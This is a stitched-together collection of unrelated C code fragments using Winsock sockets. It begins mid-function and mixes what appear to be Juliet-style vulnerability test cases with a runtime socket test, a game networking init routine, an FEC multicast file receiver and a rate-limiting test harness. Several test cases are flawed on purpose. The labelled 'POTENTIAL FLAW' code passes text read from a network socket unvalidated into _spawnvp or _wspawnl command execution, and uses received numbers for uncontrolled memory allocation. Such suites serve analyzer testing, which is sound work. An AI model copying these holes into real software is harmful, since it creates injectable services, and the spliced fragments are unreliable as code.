FD_ZERO(&exceptfds); } closesocket(sock_list.MainSock); WSACleanup(); return 0; }
void badSource(wchar_t * &data) { { #ifdef _WIN32 WSADATA wsaData; int wsaDataInit = 0; #endif int recvResult; struct sockaddr_in service; wchar_t *replace; SOCKET listenSocket = INVALID_SOCKET; SOCKET acceptSocket = INVALID_SOCKET; size_t dataLen = wcslen(data); do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR) { break; } wsaDataInit = 1; #endif /* POTENTIAL FLAW: Read data using a listen socket */ listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (listenSocket == INVALID_SOCKET) { break; } memset(&service, 0, sizeof(service)); service.sin_family = AF_INET; service.sin_addr.s_addr = INADDR_ANY; service.sin_port = htons(TCP_PORT); if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) { break; } if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR) { break; } acceptSocket = accept(listenSocket, NULL, NULL); if (acceptSocket == SOCKET_ERROR) { break; } /* Abort on error or the connection was closed */ recvResult = recv(acceptSocket, (char *)(data + dataLen), sizeof(wchar_t) * (100 - dataLen - 1), 0); if (recvResult == SOCKET_ERROR || recvResult == 0) { break; } /* Append null terminator */ data[dataLen + recvResult / sizeof(wchar_t)] = L'\0'; /* Eliminate CRLF */ replace = wcschr(data, L'\r'); if (replace) { *replace = L'\0'; } replace = wcschr(data, L'\n'); if (replace) { *replace = L'\0'; } } while (0); if (listenSocket != INVALID_SOCKET) { CLOSE_SOCKET(listenSocket); } if (acceptSocket != INVALID_SOCKET) { CLOSE_SOCKET(acceptSocket); } #ifdef _WIN32 if (wsaDataInit) { WSACleanup(); } #endif } }
void CWE78_OS_Command_Injection__char_listen_socket_w32_spawnvp_13_bad() { char * data; char dataBuffer[100] = ""; data = dataBuffer; if(GLOBAL_CONST_FIVE==5) { { #ifdef _WIN32 WSADATA wsaData; int wsaDataInit = 0; #endif int recvResult; struct sockaddr_in service; char *replace; SOCKET listenSocket = INVALID_SOCKET; SOCKET acceptSocket = INVALID_SOCKET; size_t dataLen = strlen(data); do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR) { break; } wsaDataInit = 1; #endif /* POTENTIAL FLAW: Read data using a listen socket */ listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (listenSocket == INVALID_SOCKET) { break; } memset(&service, 0, sizeof(service)); service.sin_family = AF_INET; service.sin_addr.s_addr = INADDR_ANY; service.sin_port = htons(TCP_PORT); if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) { break; } if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR) { break; } acceptSocket = accept(listenSocket, NULL, NULL); if (acceptSocket == SOCKET_ERROR) { break; } /* Abort on error or the connection was closed */ recvResult = recv(acceptSocket, (char *)(data + dataLen), sizeof(char) * (100 - dataLen - 1), 0); if (recvResult == SOCKET_ERROR || recvResult == 0) { break; } /* Append null terminator */ data[dataLen + recvResult / sizeof(char)] = '\0'; /* Eliminate CRLF */ replace = strchr(data, '\r'); if (replace) { *replace = '\0'; } replace = strchr(data, '\n'); if (replace) { *replace = '\0'; } } while (0); if (listenSocket != INVALID_SOCKET) { CLOSE_SOCKET(listenSocket); } if (acceptSocket != INVALID_SOCKET) { CLOSE_SOCKET(acceptSocket); } #ifdef _WIN32 if (wsaDataInit) { WSACleanup(); } #endif } } { char *args[] = {COMMAND_INT_PATH, COMMAND_ARG1, COMMAND_ARG2, COMMAND_ARG3, NULL}; /* spawnvp - searches for the location of the command among * the directories specified by the PATH environment variable */ /* POTENTIAL FLAW: Execute command without validating input possibly leading to command injection */ _spawnvp(_P_WAIT, COMMAND_INT, args); } }
void CWE789_Uncontrolled_Mem_Alloc__malloc_wchar_t_connect_socket_44_bad() { size_t data; /* define a function pointer */ void (*funcPtr) (size_t) = badSink; /* Initialize data */ data = 0; { #ifdef _WIN32 WSADATA wsaData; int wsaDataInit = 0; #endif int recvResult; struct sockaddr_in service; SOCKET connectSocket = INVALID_SOCKET; char inputBuffer[CHAR_ARRAY_SIZE]; do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR) { break; } wsaDataInit = 1; #endif /* POTENTIAL FLAW: Read data using a connect socket */ connectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (connectSocket == INVALID_SOCKET) { break; } memset(&service, 0, sizeof(service)); service.sin_family = AF_INET; service.sin_addr.s_addr = inet_addr(IP_ADDRESS); service.sin_port = htons(TCP_PORT); if (connect(connectSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) { break; } /* Abort on error or the connection was closed, make sure to recv one * less char than is in the recv_buf in order to append a terminator */ recvResult = recv(connectSocket, inputBuffer, CHAR_ARRAY_SIZE - 1, 0); if (recvResult == SOCKET_ERROR || recvResult == 0) { break; } /* NUL-terminate the string */ inputBuffer[recvResult] = '\0'; /* Convert to unsigned int */ data = strtoul(inputBuffer, NULL, 0); } while (0); if (connectSocket != INVALID_SOCKET) { CLOSE_SOCKET(connectSocket); } #ifdef _WIN32 if (wsaDataInit) { WSACleanup(); } #endif } /* use the function pointer */ funcPtr(data); }
int __cdecl main(int argc, char *argv[]) { WORD VersionRequested = MAKEWORD(2, 2); WSADATA WsaData; int err; int InvalidSocketID = -1; /*set an invalid socket descriptor*/ struct sockaddr_in mySockaddr; const char *data = "sendto and recvfrom test"; int nBuffer=strlen(data); /*Initialize the PAL environment*/ err = PAL_Initialize(argc, argv); if(0 != err) { return FAIL; } /*initialize to use winsock2 .dll*/ err = WSAStartup(VersionRequested, &WsaData); if(err != 0) { Fail("\nFailed to find a usable WinSock DLL!\n"); } /*Confirm that the WinSock DLL supports 2.2.*/ if(LOBYTE( WsaData.wVersion ) != 2 || HIBYTE( WsaData.wVersion ) != 2) { Trace("\nFailed to find a usable WinSock DLL!\n"); err = WSACleanup(); if(SOCKET_ERROR == err) { Trace("\nFailed to call WSACleanup API!\n"); } Fail(""); } /*prepare the sockaddr_in structure*/ mySockaddr.sin_family = AF_INET; mySockaddr.sin_port = getRotorTestPort(); mySockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1"); memset(&(mySockaddr.sin_zero), 0, 8); /*call sendto by passing an invalid socket*/ err=sendto(InvalidSocketID, data, nBuffer, 0, (struct sockaddr *)&mySockaddr, sizeof(struct sockaddr)); if(WSAENOTSOCK != GetLastError() || SOCKET_ERROR != err) { Trace("\nFailed to call sendto API for a negative test " "by passing invalid socket!\n"); err = WSACleanup(); if(SOCKET_ERROR == err) { Trace("\nFailed to call WSACleanup API!\n"); } Fail(""); } err = WSACleanup(); if(SOCKET_ERROR == err) { Fail("\nFailed to call WSACleanup API!\n"); } PAL_Terminate(); return PASS; }
//=========================================================================== // // Parameter: - // Returns: - // Changes Globals: - //=========================================================================== int WINS_Init(void) { int i; struct hostent *local; char buff[MAXHOSTNAMELEN]; struct sockaddr_s addr; char *p; int r; WORD wVersionRequested; wVersionRequested = MAKEWORD(1, 1); r = WSAStartup (wVersionRequested, &winsockdata); if (r) { WinPrint("Winsock initialization failed.\n"); return -1; } /* i = COM_CheckParm ("-udpport"); if (i == 0)*/ net_hostport = DEFAULTnet_hostport; /* else if (i < com_argc-1) net_hostport = Q_atoi (com_argv[i+1]); else Sys_Error ("WINS_Init: you must specify a number after -udpport"); */ // determine my name & address gethostname(buff, MAXHOSTNAMELEN); local = gethostbyname(buff); myAddr = *(int *)local->h_addr_list[0]; // if the quake hostname isn't set, set it to the machine name // if (Q_strcmp(hostname.string, "UNNAMED") == 0) { // see if it's a text IP address (well, close enough) for (p = buff; *p; p++) if ((*p < '0' || *p > '9') && *p != '.') break; // if it is a real name, strip off the domain; we only want the host if (*p) { for (i = 0; i < 15; i++) if (buff[i] == '.') break; buff[i] = 0; } // Cvar_Set ("hostname", buff); } if ((net_controlsocket = WINS_OpenSocket (0)) == -1) WinError("WINS_Init: Unable to open control socket\n"); ((struct sockaddr_in *)&broadcastaddr)->sin_family = AF_INET; ((struct sockaddr_in *)&broadcastaddr)->sin_addr.s_addr = INADDR_BROADCAST; ((struct sockaddr_in *)&broadcastaddr)->sin_port = htons((u_short)net_hostport); WINS_GetSocketAddr (net_controlsocket, &addr); strcpy(my_tcpip_address, WINS_AddrToString (&addr)); p = strrchr (my_tcpip_address, ':'); if (p) *p = 0; WinPrint("Winsock Initialized\n"); return net_controlsocket; } //end of the function WINS_Init
int main (int argc, char *argv[]) { struct sockaddr_in sin; int sock, len; char p[4096], *fname = "x.fec"; struct timeval tv; fd_set set; FILE *f; fecDecoder *d; struct ip_mreq mreq; #if defined (WIN32) || defined (__CYGWIN__) WSADATA localWSA; if (WSAStartup (MAKEWORD(1,1),&localWSA) != 0) { fprintf (stderr, "Unable to load wsock32.dll\n"); mainreturn (1); } #endif fprintf (stderr, "%s: %s\n", argv[0], FEC_COPYRIGHT); if ((sock = socket (PF_INET, SOCK_DGRAM, 0)) == -1) { fprintf (stderr, "Unable to make internet socket\n"); mainreturn (3); } memset (&sin, 0, sizeof (sin)); sin.sin_family = AF_INET; *(unsigned*)&sin.sin_addr = 0; //inet_addr (iface); sin.sin_port = SUGGESTED_FEC_UDP_PORT_NUMBER; for (;argc > 1; argc--, argv++) { if (strcmp (argv[1], "-h") == 0) { fprintf (stderr, "Usage : %s [-f %s] [-p portNumber] [-i interface] [-m multicastAddress]\n" "Receives a file and exits. If the file was received successfully\n" "it is called `%s' (adjustable with -f), otherwise it is deleted.\n" "Note that the interface is the IP address of the local device\n", argv[0], fname, fname); mainreturn (4); } else if (strcmp (argv[1], "-f") == 0) { fname = argv[2]; argc--, argv++; } else if (strcmp (argv[1], "-p") == 0) { sin.sin_port = htons (atoi (argv[2])); argc--, argv++; } else if (strcmp (argv[1], "-i") == 0) { *(unsigned*)&sin.sin_addr = inet_addr (argv[2]); argc--, argv++; } else if (strcmp (argv[1], "-m") == 0) { *(unsigned*)&mreq.imr_multiaddr = inet_addr (argv[2]); *(unsigned*)&mreq.imr_interface = *(unsigned*)&sin.sin_addr; if (setsockopt (sock, IPPROTO_IP, IP_ADD_MEMBERSHIP, (char*) &mreq, sizeof(mreq)) < 0) fprintf (stderr, "Unable to active multicast\n"); } else fprintf (stderr, "Unknown option %s. Use -h for help\n", argv[1]); } if (bind (sock, (struct sockaddr*) &sin, sizeof (sin)) == -1) { fprintf (stderr, "Error : UDP port or device is unavailable\n"); mainreturn (1); } f = fopen (fname, "w"); d = NewFecDecoder (f, WriteF); do { len = recv (sock, p, sizeof (p), 0); FecDecode (p, len, 1, d); FD_ZERO (&set); FD_SET (sock, &set); tv.tv_sec = 30; tv.tv_usec = 0; } while (select (sock + 1, &set, NULL, NULL, &tv) != 0); FlushFecDecoder (d); fclose (f); fprintf (stderr, "File received. %d packets was unrecoverable out of %d\n", d->lostPackets, (d->lostPackets + d->receivedPackets + d->correctedPackets)); if (d->lostPackets > 0) unlink (fname); closesocket (sock); mainreturn (0); }
int main(int argc, char **argv) { int i,j; double ratio; #ifdef _WIN32 WORD wVersionRequested = MAKEWORD(2,2); WSADATA wsaData; int err; err = WSAStartup(wVersionRequested, &wsaData); #endif #ifndef _WIN32 if (signal(SIGPIPE, SIG_IGN) == SIG_ERR) return 1; #endif for (i = 1; i < argc; ++i) { for (j = 0; options[j].name; ++j) { if (!strcmp(argv[i],options[j].name)) { if (handle_option(argc,argv,&i,&options[j])<0) return 1; goto again; } } fprintf(stderr, "Unknown option '%s'\n", argv[i]); usage(); return 1; again: ; } if (cfg_help) { usage(); return 0; } cfg_tick.tv_sec = cfg_tick_msec / 1000; cfg_tick.tv_usec = (cfg_tick_msec % 1000)*1000; seconds_per_tick = ratio = cfg_tick_msec / 1000.0; cfg_connlimit *= ratio; cfg_grouplimit *= ratio; { struct timeval tv; evutil_gettimeofday(&tv, NULL); #ifdef _WIN32 srand(tv.tv_usec); #else srandom(tv.tv_usec); #endif } #ifndef EVENT__DISABLE_THREAD_SUPPORT evthread_enable_lock_debuging(); #endif return test_ratelimiting(); }
void CWE78_OS_Command_Injection__wchar_t_listen_socket_w32spawnl_18_bad() { wchar_t * data; wchar_t dataBuffer[100] = L""; data = dataBuffer; goto source; source: { #ifdef _WIN32 WSADATA wsaData; int wsaDataInit = 0; #endif int recvResult; struct sockaddr_in service; wchar_t *replace; SOCKET listenSocket = INVALID_SOCKET; SOCKET acceptSocket = INVALID_SOCKET; size_t dataLen = wcslen(data); do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR) { break; } wsaDataInit = 1; #endif /* POTENTIAL FLAW: Read data using a listen socket */ listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (listenSocket == INVALID_SOCKET) { break; } memset(&service, 0, sizeof(service)); service.sin_family = AF_INET; service.sin_addr.s_addr = INADDR_ANY; service.sin_port = htons(TCP_PORT); if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) { break; } if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR) { break; } acceptSocket = accept(listenSocket, NULL, NULL); if (acceptSocket == SOCKET_ERROR) { break; } /* Abort on error or the connection was closed */ recvResult = recv(acceptSocket, (char *)(data + dataLen), sizeof(wchar_t) * (100 - dataLen - 1), 0); if (recvResult == SOCKET_ERROR || recvResult == 0) { break; } /* Append null terminator */ data[dataLen + recvResult / sizeof(wchar_t)] = L'\0'; /* Eliminate CRLF */ replace = wcschr(data, L'\r'); if (replace) { *replace = L'\0'; } replace = wcschr(data, L'\n'); if (replace) { *replace = L'\0'; } } while (0); if (listenSocket != INVALID_SOCKET) { CLOSE_SOCKET(listenSocket); } if (acceptSocket != INVALID_SOCKET) { CLOSE_SOCKET(acceptSocket); } #ifdef _WIN32 if (wsaDataInit) { WSACleanup(); } #endif } /* wspawnl - specify the path where the command is located */ /* POTENTIAL FLAW: Execute command without validating input possibly leading to command injection */ _wspawnl(_P_WAIT, COMMAND_INT_PATH, COMMAND_INT_PATH, COMMAND_ARG1, COMMAND_ARG2, COMMAND_ARG3, NULL); }